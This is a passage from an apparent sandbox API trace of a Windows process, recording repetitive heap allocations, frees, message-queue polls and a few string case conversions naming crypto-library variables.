(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0204.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0204.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0204.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0204.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0204.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0204.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0204.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0204.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0204.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0204.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0204.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0204.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0204.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0204.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0204.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0204.772] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0204.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0204.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0204.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0204.772] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0204.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0204.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0204.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0204.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0204.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0204.773] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0204.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0204.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0204.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0204.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0204.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0204.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0204.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0204.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0204.773] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0204.774] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0204.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0204.774] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0204.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0204.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0204.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0204.774] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0204.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.774] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0204.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.774] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0204.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0204.775] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0204.775] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0204.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0204.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0204.775] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0204.775] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0204.775] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0204.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0204.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0204.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0204.776] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0204.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0204.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0204.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0204.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0204.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0204.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0204.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0204.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0204.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0204.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0204.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0204.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0204.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0204.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0204.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0204.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0204.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0204.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0204.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f1) returned 0x2e95430 [0204.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e95430 | out: hHeap=0x970000) returned 1 [0204.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0204.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0204.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0204.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0204.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0204.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0204.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0204.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0204.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0204.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0204.783] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0204.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0204.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0204.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | 